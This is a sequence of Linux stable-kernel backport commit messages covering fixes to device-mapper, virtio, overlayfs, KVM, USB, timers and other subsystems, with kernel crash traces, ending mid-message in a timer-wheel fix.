commit 5c33677c87 upstream.
In ecbfb9f118 ("dm raid: add raid level takeover support") a new
compatible feature flag was added. Validation for these compat_features
was added but this only passes for new raid mappings with this feature
flag. This causes previously created raid mappings to be failed at
import.
Check compat_features for the only valid combination.
Fixes: ecbfb9f118 ("dm raid: add raid level takeover support")
Signed-off-by: Andy Whitcroft <apw@canonical.com>
Signed-off-by: Heinz Mauelshagen <heinzm@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 937fa62e8a upstream.
cleanup_mapped_device() calls kthread_stop() if kworker_task is
non-NULL. Currently the assigned value could be a valid task struct or
an error code (e.g -ENOMEM). Reset md->kworker_task to NULL if
kthread_run() returned an erorr.
Fixes: 7193a9defc ("dm rq: check kthread_run return for .request_fn request-based DM")
Reported-by: Tahsin Erdogan <tahsin@google.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dafa724bf5 upstream.
dm_get_target_type() was previously called so any error returned from
dm_table_add_target() must first call dm_put_target_type(). Otherwise
the DM target module's reference count will leak and the associated
kernel module will be unable to be removed.
Also, leverage the fact that r is already -EINVAL and remove an extra
newline.
Fixes: 36a0456 ("dm table: add immutable feature")
Fixes: cc6cbe1 ("dm table: add always writeable feature")
Fixes: 3791e2f ("dm table: add singleton feature")
Signed-off-by: tang.junhui <tang.junhui@zte.com.cn>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dcb2ff5641 upstream.
If a default leg has failed, any read will cause a new operational
default leg to be selected and the read is resubmitted. But until now
the read will return failure even though it was successful due to
resubmission. The reason for this is bio->bi_error was not being
cleared before resubmitting the bio.
Fix by clearing bio->bi_error before resubmission.
Fixes: 4246a0b63b ("block: add a bi_error field to struct bio")
Signed-off-by: Heinz Mauelshagen <heinzm@redhat.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 34563769e4 upstream.
Commit c6017e793b ("virtio: console: add locks around buffer removal
in port unplug path") added locking around the freeing of buffers in the
vq. However, when free_buf() is called with can_sleep = true and rproc
is enabled, it calls dma_free_coherent() directly, requiring interrupts
to be enabled. Currently a WARNING is triggered due to the spin locking
around free_buf, with a call stack like this:
WARNING: CPU: 3 PID: 121 at ./include/linux/dma-mapping.h:433
free_buf+0x1a8/0x288
Call Trace:
[<8040c538>] show_stack+0x74/0xc0
[<80757240>] dump_stack+0xd0/0x110
[<80430d98>] __warn+0xfc/0x130
[<80430ee0>] warn_slowpath_null+0x2c/0x3c
[<807e7c6c>] free_buf+0x1a8/0x288
[<807ea590>] remove_port_data+0x50/0xac
[<807ea6a0>] unplug_port+0xb4/0x1bc
[<807ea858>] virtcons_remove+0xb0/0xfc
[<807b6734>] virtio_dev_remove+0x58/0xc0
[<807f918c>] __device_release_driver+0xac/0x134
[<807f924c>] device_release_driver+0x38/0x50
[<807f7edc>] bus_remove_device+0xfc/0x130
[<807f4b74>] device_del+0x17c/0x21c
[<807f4c38>] device_unregister+0x24/0x38
[<807b6b50>] unregister_virtio_device+0x28/0x44
Fix this by restructuring the loops to allow the locks to only be taken
where it is necessary to protect the vqs, and release it while the
buffer is being freed.
Fixes: c6017e793b ("virtio: console: add locks around buffer removal in port unplug path")
Signed-off-by: Matt Redfearn <matt.redfearn@imgtec.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0be1db430 upstream.
Legacy virtio defines the virtqueue base using a 32-bit PFN field, with
a read-only register indicating a fixed page size of 4k.
This can cause problems for DMA allocators that allocate top down from
the DMA mask, which is set to 64 bits. In this case, the addresses are
silently truncated to 44-bit, leading to IOMMU faults, failure to read
from the queue or data corruption.
This patch restricts the coherent DMA mask for legacy PCI virtio devices
to 44 bits, which matches the specification.
Cc: Andy Lutomirski <luto@kernel.org>
Cc: Michael S. Tsirkin <mst@redhat.com>
Cc: Benjamin Serebrin <serebrin@google.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0ea1e4a6d9 upstream.
According to the spec, if the VIRTIO_RING_F_EVENT_IDX feature bit is
negotiated the driver MUST set flags to 0. Not dirtying the available
ring in virtqueue_disable_cb also has a minor positive performance
impact, improving L1 dcache load missed by ~0.5% in vring_bench.
Writes to the used event field (vring_used_event) are still unconditional.
Cc: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Ladi Prosek <lprosek@redhat.com>
Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6ed518328d upstream.
We have one critical section in the syscall entry path in which we switch from
the userspace stack to kernel stack. In the event of an external interrupt, the
interrupt code distinguishes between those two states by analyzing the value of
sr7. If sr7 is zero, it uses the kernel stack. Therefore it's important, that
the value of sr7 is in sync with the currently enabled stack.
This patch now disables interrupts while executing the critical section. This
prevents the interrupt handler to possibly see an inconsistent state which in
the worst case can lead to crashes.
Interestingly, in the syscall exit path interrupts were already disabled in the
critical section which switches back to the userspace stack.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 641089c154 upstream.
Make sure the copied up file hits the disk before renaming to the final
destination. If this is not done then the copy-up may corrupt the data in
the file in case of a crash.
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit fd3220d37b upstream.
This change fixes xfstest generic/375, which failed to clear the
setgid bit in the following test case on overlayfs:
touch $testfile
chown 100:100 $testfile
chmod 2755 $testfile
_runas -u 100 -g 101 -- setfacl -m u::rwx,g::rwx,o::rwx $testfile
Reported-by: Amir Goldstein <amir73il@gmail.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Tested-by: Amir Goldstein <amir73il@gmail.com>
Fixes: d837a49bd5 ("ovl: fix POSIX ACL setting")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b93d4a0eb3 upstream.
tmpfs doesn't have ->get_acl() because it only uses cached acls.
This fixes the acl tests in pjdfstest when tmpfs is used as the upper layer
of the overlay.
Reported-by: Amir Goldstein <amir73il@gmail.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: 39a25b2b37 ("ovl: define ->get_acl() for overlay inodes")
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1b283eea62 upstream.
This fixes a very annoying regression on the Snowball SD card
that has been around for a while. It turns out that the device
tree does not configure the direction pins properly, nor sets
up the pins for the voltage converter properly at boot. Unless
all things are correctly set up, the feedback clock will not
work, and makes the driver spew messages in the console (but
it works, very slowly):
root@Ux500:/ mount /dev/mmcblk0p2 /mnt/
[ 9.953460] mmci-pl18x 80126000.sdi0_per1: error during DMA transfer!
[ 9.960296] mmcblk0: error -110 sending status command, retrying
[ 9.966461] mmcblk0: error -110 sending status command, retrying
[ 9.972534] mmcblk0: error -110 sending status command, aborting
Fix this by rectifying the device tree to correspond to that of
the Ux500 HREF boards plus the DAT31DIR setting that is unique for
the Snowball, and things start working smoothly. Add in the SDR12
and SDR25 modes which this host can do without any problems.
I don't know if this has ever been correct, sadly. It works after
this patch.
Reported-by: Daniel Lezcano <daniel.lezcano@linaro.org>
Cc: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Olof Johansson <olof@lixom.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 33c45ef8ad upstream.
Since the commit bd3677ff31 ("clk: mvebu: Remove corediv clock from
Armada XP"), the corediv clk is no more selected for Armada XP, however
this clock is used for Armada XP using the compatible
armada-370-corediv-clock.
While since commit 1594d568c6 ("clk: mvebu: Move corediv config to
mvebu config") Armada 38x and Armada 375 got corediv support again, not
only Armada XP was missed but also Armada 39x.
Actually all the SoC selecting MVEBU_V7 config need this clock:
git grep "\-corediv-clock" arch/arm/boot/dts
arch/arm/boot/dts/armada-370-xp.dtsi: compatible = "marvell,armada-370-corediv-clock";
arch/arm/boot/dts/armada-375.dtsi: compatible = "marvell,armada-375-corediv-clock";
arch/arm/boot/dts/armada-38x.dtsi: compatible = "marvell,armada-380-corediv-clock";
arch/arm/boot/dts/armada-39x.dtsi: compatible = "marvell,armada-390-corediv-clock"
This commit now fixes this behavior by letting MVEBU_V7 select
MVEBU_CLK_COREDIV.
Fixes: bd3677ff31 ("clk: mvebu: Remove corediv clock from Armada XP")
Reported-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Acked-by: Uwe Kleine-König <u.kleine-koenig@pengutronix.de>
Signed-off-by: Gregory CLEMENT <gregory.clement@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit e1e575f6b0 upstream.
The advancing of the PC when completing an MMIO load is done before
re-entering the guest, i.e. before restoring the guest ASID. However if
the load is in a branch delay slot it may need to access guest code to
read the prior branch instruction. This isn't safe in TLB mapped code at
the moment, nor in the future when we'll access unmapped guest segments
using direct user accessors too, as it could read the branch from host
user memory instead.
Therefore calculate the resume PC in advance while we're still in the
right context and save it in the new vcpu->arch.io_pc (replacing the no
longer needed vcpu->arch.pending_load_cause), and restore it on MMIO
completion.
Fixes: e685c689f3 ("KVM/MIPS32: Privileged instruction/target branch emulation.")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ede5f3e7b5 upstream.
The ERET instruction to return from exception is used for returning from
exception level (Status.EXL) and error level (Status.ERL). If both bits
are set however we should be returning from ERL first, as ERL can
interrupt EXL, for example when an NMI is taken. KVM however checks EXL
first.
Fix the order of the checks to match the pseudocode in the instruction
set manual.
Fixes: e685c689f3 ("KVM/MIPS32: Privileged instruction/target branch emulation.")
Signed-off-by: James Hogan <james.hogan@imgtec.com>
Cc: Paolo Bonzini <pbonzini@redhat.com>
Cc: "Radim Krčmář" <rkrcmar@redhat.com>
Cc: Ralf Baechle <ralf@linux-mips.org>
Cc: linux-mips@linux-mips.org
Cc: kvm@vger.kernel.org
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bd768e1466 upstream.
vcpu->arch.wbinvd_dirty_mask may still be used after freeing it,
corrupting memory. For example, the following call trace may set a bit
in an already freed cpu mask:
kvm_arch_vcpu_load
vcpu_load
vmx_free_vcpu_nested
vmx_free_vcpu
kvm_arch_vcpu_free
Fix this by deferring freeing of wbinvd_dirty_mask.
Signed-off-by: Ido Yariv <ido@wizery.com>
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Radim Krčmář <rkrcmar@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d09960b003 upstream.
dm_old_request_fn() has paths that access md->io_barrier. The party
destroying io_barrier should ensure that no future execution of
dm_old_request_fn() is possible. Move io_barrier destruction to below
blk_cleanup_queue() to ensure this and avoid a NULL pointer crash during
request-based DM device shutdown.
Signed-off-by: Tahsin Erdogan <tahsin@google.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1d4f1d53e1 upstream.
Commit 2518ac59eb ("staging: wilc1000: Replace kthread with workqueue
for host interface") adds an unconditional destroy_workqueue() on the
wilc's "hif_workqueue" soon after its creation thereby rendering
it unusable. It then further attempts to queue work onto this
non-existing hif_worqueue and results in:
Unable to handle kernel NULL pointer dereference at virtual address 00000010
pgd = de478000
[00000010] *pgd=3eec0831, *pte=00000000, *ppte=00000000
Internal error: Oops: 17 [#1] ARM
Modules linked in: wilc1000_sdio(C) wilc1000(C)
CPU: 0 PID: 825 Comm: ifconfig Tainted: G C 4.8.0-rc8+ #37
Hardware name: Atmel SAMA5
task: df56f800 task.stack: deeb0000
PC is at __queue_work+0x90/0x284
LR is at __queue_work+0x58/0x284
pc : [<c0126bb0>] lr : [<c0126b78>] psr: 600f0093
sp : deeb1aa0 ip : def22d78 fp : deea6000
r10: 00000000 r9 : c0a08150 r8 : c0a2f058
r7 : 00000001 r6 : dee9b600 r5 : def22d74 r4 : 00000000
r3 : 00000000 r2 : def22d74 r1 : 07ffffff r0 : 00000000
Flags: nZCv IRQs off FIQs on Mode SVC_32 ISA ARM Segment none
...
[<c0127060>] (__queue_work) from [<c0127298>] (queue_work_on+0x34/0x40)
[<c0127298>] (queue_work_on) from [<bf0076b4>] (wilc_enqueue_cmd+0x54/0x64 [wilc1000])
[<bf0076b4>] (wilc_enqueue_cmd [wilc1000]) from [<bf0082b4>] (wilc_set_wfi_drv_handler+0x48/0x70 [wilc1000])
[<bf0082b4>] (wilc_set_wfi_drv_handler [wilc1000]) from [<bf00509c>] (wilc_mac_open+0x214/0x250 [wilc1000])
[<bf00509c>] (wilc_mac_open [wilc1000]) from [<c04fde98>] (__dev_open+0xb8/0x11c)
[<c04fde98>] (__dev_open) from [<c04fe128>] (__dev_change_flags+0x94/0x158)
[<c04fe128>] (__dev_change_flags) from [<c04fe204>] (dev_change_flags+0x18/0x48)
[<c04fe204>] (dev_change_flags) from [<c0557d5c>] (devinet_ioctl+0x6b4/0x788)
[<c0557d5c>] (devinet_ioctl) from [<c04e40a0>] (sock_ioctl+0x154/0x2cc)
[<c04e40a0>] (sock_ioctl) from [<c01b16e0>] (do_vfs_ioctl+0x9c/0x878)
[<c01b16e0>] (do_vfs_ioctl) from [<c01b1ef0>] (SyS_ioctl+0x34/0x5c)
[<c01b1ef0>] (SyS_ioctl) from [<c0107520>] (ret_fast_syscall+0x0/0x3c)
Code: e5932004 e1520006 01a04003 0affffff (e5943010)
---[ end trace b612328adaa6bf20 ]---
This fix removes the unnecessary call to destroy_workqueue() while opening
the device to avoid the above kernel panic. The deinit routine already
does a good job of terminating the workqueue when no longer needed.
Reported-by: Nicolas Ferre <Nicolas.Ferre@microchip.com>
Fixes: 2518ac59eb ("staging: wilc1000: Replace kthread with workqueue for host interface")
Signed-off-by: Aditya Shankar <Aditya.Shankar@microchip.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d1fe85ec77 upstream.
This will result in a random value being reported on big endian architectures.
(thanks to Lars-Peter Clausen for pointing out the effects of this bug)
Only effects a value printed to the log, but as this reports the settings of
the probe in question it may be of direct interest to users.
Also, fixes the following sparse endianness warnings:
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
drivers/iio/chemical/atlas-ph-sensor.c:215:9: warning: cast to restricted __be16
Signed-off-by: Sandhya Bankar <bankarsandhya512@gmail.com>
Fixes: e8dd92bfbf ("iio: chemical: atlas-ph-sensor: add EC feature")
Signed-off-by: Jonathan Cameron <jic23@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 51227bf520 upstream.
I2C and SPI interfaces share common clock trees within the CP110 HW block.
It occurred that SPI0 interface has wrong clock assignment in the device
tree, which is fixed in this commit to a proper value.
Fixes: 728dacc7f4 ("arm64: dts: marvell: initial DT description of ...")
Signed-off-by: Marcin Wojtas <mw@semihalf.com>
Signed-off-by: Gregory CLEMENT <gregory.clement@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 346e99736c upstream.
If a device is unplugged and replugged during Sx system suspend
some Intel xHC hosts will overwrite the CAS (Cold attach status) flag
and no device connection is noticed in resume.
A device in this state can be identified in resume if its link state
is in polling or compliance mode, and the current connect status is 0.
A device in this state needs to be warm reset.
Intel 100/c230 series PCH specification update Doc #332692-006 Errata #8
Observed on Cherryview and Apollolake as they go into compliance mode
if LFPS times out during polling, and re-plugged devices are not
discovered at resume.
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4c39135aa4 upstream.
xHC in Wildcatpoint-LP PCH is similar to LynxPoint-LP and need the
same quirks to prevent machines from spurious restart while
shutting them down.
Reported-by: Hasan Mahmood <hasan.mahm@gmail.com>
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 407a3aee6e upstream.
The host keeps sending heartbeat packets independent of the
guest responding to them. Even though we respond to the heartbeat messages at
interrupt level, we can have situations where there maybe multiple heartbeat
messages pending that have not been responded to. For instance this occurs when the
VM is paused and the host continues to send the heartbeat messages.
Address this issue by draining and responding to all
the heartbeat messages that maybe pending.
Signed-off-by: Long Li <longli@microsoft.com>
Signed-off-by: K. Y. Srinivasan <kys@microsoft.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 1e90a13d0c upstream.
The recent changes, which forced the registration of the boot cpu on UP
systems, which do not have ACPI tables, have been fixed for systems w/o
local APIC, but left a wreckage for systems which have neither ACPI nor
mptables, but the CPU has an APIC, e.g. virtualbox.
The boot process crashes in prefill_possible_map() as it wants to register
the boot cpu, which needs to access the local apic, but the local APIC is
not yet mapped.
There is no reason why init_apic_mapping() can't be invoked before
prefill_possible_map(). So instead of playing another silly early mapping
game, as the ACPI/mptables code does, we just move init_apic_mapping()
before the call to prefill_possible_map().
In hindsight, I should have noticed that combination earlier.
Sorry for the churn (also in stable)!
Fixes: ff8560512b ("x86/boot/smp: Don't try to poke disabled/non-existent APIC")
Reported-and-debugged-by: Michal Necasek <michal.necasek@oracle.com>
Reported-and-tested-by: Wolfgang Bauer <wbauer@tmo.at>
Cc: prarit@redhat.com
Cc: ville.syrjala@linux.intel.com
Cc: michael.thayer@oracle.com
Cc: knut.osmundsen@oracle.com
Cc: frank.mehnert@oracle.com
Cc: Borislav Petkov <bp@alien8.de>
Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1610282114380.5053@nanos
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a7a7aeefbc upstream.
When interrupting an application which was allocating DMAable
memory, it was possible, that the DMA memory was deallocated
twice, leading to the error symptoms below.
Thanks to Gerald, who analyzed the problem and provided this
patch.
I agree with his analysis of the problem: ddcb_cmd_fixups() ->
genwqe_alloc_sync_sgl() (fails in f/lpage, but sgl->sgl != NULL
and f/lpage maybe also != NULL) -> ddcb_cmd_cleanup() ->
genwqe_free_sync_sgl() (double free, because sgl->sgl != NULL and
f/lpage maybe also != NULL)
In this scenario we would have exactly the kind of double free that
would explain the WARNING / Bad page state, and as expected it is
caused by broken error handling (cleanup).
Using the Ubuntu git source, tag Ubuntu-4.4.0-33.52, he was able to reproduce
the "Bad page state" issue, and with the patch on top he could not reproduce
it any more.
------------[ cut here ]------------
WARNING: at /build/linux-o03cxz/linux-4.4.0/arch/s390/include/asm/pci_dma.h:141
Modules linked in: qeth_l2 ghash_s390 prng aes_s390 des_s390 des_generic sha512_s390 sha256_s390 sha1_s390 sha_common genwqe_card qeth crc_itu_t qdio ccwgroup vmur dm_multipath dasd_eckd_mod dasd_mod
CPU: 2 PID: 3293 Comm: genwqe_gunzip Not tainted 4.4.0-33-generic #52-Ubuntu
task: 0000000032c7e270 ti: 00000000324e4000 task.ti: 00000000324e4000
Krnl PSW : 0404c00180000000 0000000000156346 (dma_update_cpu_trans+0x9e/0xa8)
R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:0 PM:0 EA:3
Krnl GPRS: 00000000324e7bcd 0000000000c3c34a 0000000027628298 000000003215b400
0000000000000400 0000000000001fff 0000000000000400 0000000116853000
07000000324e7b1e 0000000000000001 0000000000000001 0000000000000001
0000000000001000 0000000116854000 0000000000156402 00000000324e7a38
Krnl Code: 000000000015633a: 95001000 cli 0(%r1),0
000000000015633e: a774ffc3 brc 7,1562c4
#0000000000156342: a7f40001 brc 15,156344
>0000000000156346: 92011000 mvi 0(%r1),1
000000000015634a: a7f4ffbd brc 15,1562c4
000000000015634e: 0707 bcr 0,%r7
0000000000156350: c00400000000 brcl 0,156350
0000000000156356: eb7ff0500024 stmg %r7,%r15,80(%r15)
Call Trace:
([<00000000001563e0>] dma_update_trans+0x90/0x228)
[<00000000001565dc>] s390_dma_unmap_pages+0x64/0x160
[<00000000001567c2>] s390_dma_free+0x62/0x98
[<000003ff801310ce>] __genwqe_free_consistent+0x56/0x70 [genwqe_card]
[<000003ff801316d0>] genwqe_free_sync_sgl+0xf8/0x160 [genwqe_card]
[<000003ff8012bd6e>] ddcb_cmd_cleanup+0x86/0xa8 [genwqe_card]
[<000003ff8012c1c0>] do_execute_ddcb+0x110/0x348 [genwqe_card]
[<000003ff8012c914>] genwqe_ioctl+0x51c/0xc20 [genwqe_card]
[<000000000032513a>] do_vfs_ioctl+0x3b2/0x518
[<0000000000325344>] SyS_ioctl+0xa4/0xb8
[<00000000007b86c6>] system_call+0xd6/0x264
[<000003ff9e8e520a>] 0x3ff9e8e520a
Last Breaking-Event-Address:
[<0000000000156342>] dma_update_cpu_trans+0x9a/0xa8
---[ end trace 35996336235145c8 ]---
BUG: Bad page state in process jbd2/dasdb1-8 pfn:3215b
page:000003d100c856c0 count:-1 mapcount:0 mapping: (null) index:0x0
flags: 0x3fffc0000000000()
page dumped because: nonzero _count
Signed-off-by: Gerald Schaefer <gerald.schaefer@de.ibm.com>
Signed-off-by: Frank Haverkamp <haver@linux.vnet.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ed6d6f8f42 upstream.
Increase ohci watchout delay to 275 ms. Previous delay was 250 ms
with 20 ms of slack, after removing slack time some ohci controllers don't
respond in time. Logs from systems with controllers that have the
issue would show "HcDoneHead not written back; disabled"
Signed-off-by: Bryan Paluch <bryanpaluch@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b76032396d upstream.
Since the controller on R-Car Gen3 doesn't have any status registers
to detect initialization (LPSTS.SUSPM = 1) and the initialization needs
up to 45 usec, this patch adds wait after the initialization. Otherwise,
writing other registers (e.g. INTENB0) will fail.
Fixes: de18757e27 ("usb: renesas_usbhs: add R-Car Gen3 power control")
Cc: <balbi@kernel.org>
Signed-off-by: Yoshihiro Shimoda <yoshihiro.shimoda.uh@renesas.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7d3b016a6f upstream.
USB2 host inititated resume, and system suspend bus resume
need to use the same USB_RESUME_TIMEOUT as elsewhere.
This resolves a device disconnect issue at system resume seen
on Intel Braswell and Apollolake, but is in no way limited to
those platforms.
Signed-off-by: Mathias Nyman <mathias.nyman@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca006f785f upstream.
This adds support to ftdi_sio for the Infineon TriBoard TC2X7
engineering board for first-generation Aurix SoCs with Tricore CPUs.
Mere addition of the device IDs does the job.
Signed-off-by: Stefan Tauner <stefan.tauner@technikum-wien.at>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit de24e0a108 upstream.
The current tiocmget implementation would fail to report errors up the
stack and instead leaked a few bits from the stack as a mask of
modem-status flags.
Fixes: 39a66b8d22 ("[PATCH] USB: CP2101 Add support for flow control")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 126d26f66d upstream.
Make sure we have at least one port before attempting to register a
console.
Currently, at least one driver binds to a "dummy" interface and requests
zero ports for it. Should such an interface also lack endpoints, we get
a NULL-deref during probe.
Fixes: e5b1e2062e ("USB: serial: make minor allocation dynamic")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6c83f77278 upstream.
If we don't guarantee that we will always get an
interrupt at least when we're queueing our very last
request, we could fall into situation where we queue
every request with 'no_interrupt' set. This will
cause the link to get stuck.
The behavior above has been triggered with g_ether
and dwc3.
Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43605e293e upstream.
SEC registers are not accessible when the TXE device is in low power
state, hence the SEC interrupt cannot be processed if device is not
awake.
In some rare cases entrance to low power state (aliveness off) and input
ready bits can be signaled at the same time, resulting in communication
stall as input ready won't be signaled again after waking up. To resolve
this IPC_HHIER_SEC bit in HHISR_REG should not be cleaned if the
interrupt is not processed.
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c83ed4c9db upstream.
If UBIFS is facing an error while walking a directory, it reports this
error and ubifs_readdir() returns the error code. But the VFS readdir
logic does not make the getdents system call fail in all cases. When the
readdir cursor indicates that more entries are present, the system call
will just return and the libc wrapper will try again since it also
knows that more entries are present.
This causes the libc wrapper to busy loop for ever when a directory is
corrupted on UBIFS.
A common approach do deal with corrupted directory entries is
skipping them by setting the cursor to the next entry. On UBIFS this
approach is not possible since we cannot compute the next directory
entry cursor position without reading the current entry. So all we can
do is setting the cursor to the "no more entries" position and make
getdents exit.
Signed-off-by: Richard Weinberger <richard@nod.at>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 4da9152a43 upstream.
Linus stumbled over the unlocked modification of the timer expiry value in
mod_timer() which is an optimization for timers which stay in the same
bucket - due to the bucket granularity - despite their expiry time getting
updated.
The optimization itself still makes sense even if we take the lock, because
in case that the bucket stays the same, we avoid the pointless
queue/enqueue dance.
Make the check and the modification of timer->expires protected by the base
lock and shuffle the remaining code around so we can keep the lock held
when we actually have to requeue the timer to a different bucket.
Fixes: f00c0afdfa ("timers: Implement optimization for same expiry time in mod_timer()")
Reported-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Link: http://lkml.kernel.org/r/alpine.DEB.2.20.1610241711220.4983@nanos
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6bad6bccf2 upstream.
When a timer is enqueued we try to forward the timer base clock. This
mechanism has two issues:
1) Forwarding a remote base unlocked
The forwarding function is called from get_target_base() with the current
timer base lock held. But if the new target base is a different base than
the current base (can happen with NOHZ, sigh!) then the forwarding is done
on an unlocked base. This can lead to corruption of base->clk.
Solution is simple: Invoke the forwarding after the target base is locked.
2) Possible corruption due to jiffies advancing
This is similar to the issue in get_net_timer_interrupt() which was fixed
in the previous patch. jiffies can advance between check and assignement
and therefore advancing base->clk beyond the next expiry value.
So we need to read jiffies into a local variable once and do the checks and
assignment with the local copy.
Fixes: a683f390b93f("timers: Forward the wheel clock whenever possible")
Reported-by: Ashton Holmes <scoopta@gmail.com>
Reported-by: Michael Thayer <michael.thayer@oracle.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Cc: Michal Necasek <michal.necasek@oracle.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: knut.osmundsen@oracle.com
Cc: stern@rowland.harvard.edu
Cc: rt@linutronix.de
Link: http://lkml.kernel.org/r/20161022110552.253640125@linutronix.de
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 041ad7bc75 upstream.
Ashton and Michael reported, that kernel versions 4.8 and later suffer from
USB timeouts which are caused by the timer wheel rework.
This is caused by a bug in the base clock forwarding mechanism, which leads
to timers expiring early. The scenario which leads to this is:
run_timers()
while (jiffies >= base->clk) {
collect_expired_timers();
base->clk++;
expire_timers();
}
So base->clk = jiffies + 1. Now the cpu goes idle:
idle()
get_next_timer_interrupt()
nextevt = __next_time_interrupt();
if (time_after(nextevt, base->clk))
base->clk = jiffies;
jiffies has not advanced since run_timers(), so this assignment effectively
decrements base->clk by one.
base->clk is the index into the timer wheel arrays. So let's assume the
following state after the base->clk increment in run_timers():
jiffies = 0
base->clk = 1
A timer gets enqueued with an expiry delta of 63 ticks (which is the case
with the USB timeout and HZ=250) so the resulting bucket index is:
base->clk + delta = 1 + 63 = 64
The timer goes into the first wheel level. The array size is 64 so it ends
